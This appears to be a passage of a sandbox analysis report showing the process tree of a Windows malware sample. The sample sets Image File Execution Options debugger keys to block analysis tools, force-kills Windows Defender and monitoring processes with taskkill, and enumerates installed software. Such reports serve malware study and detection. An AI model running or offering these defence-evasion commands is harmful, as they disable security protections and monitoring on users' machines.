  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:584
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1884
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1788
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2524
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1292
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1560
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:2280
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1820
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:2124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:972
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:2876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:3820
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:1548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:3936
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:2492
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:2200
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:1820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1944
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:1604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1868
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:1944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:3760
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:3860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:2492
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:1048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:2872
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:3820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:3720
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2212
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:776
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2280
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:764
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:416
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:2592
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:2872
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:3456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:2484
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1204
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2292
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:2492
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:3024
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:780
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:3752
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:776
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:416
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2284
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:2524
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:416
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:2524
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:416
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4132
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4228
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4208
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4344
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4364
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4416
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4432
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4488
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4564
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4640
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4716
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4788
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4864
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4884
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4996
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5012
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:5048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:5068
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4112
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4284
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4260
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4352
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:2876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1336
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:1872
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:3704
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3756
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:1672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2492
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4180
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:1732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:3972
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:3892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:3684
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3572
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2276
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3752
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4440
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4544
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4796
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5028
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4884
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4140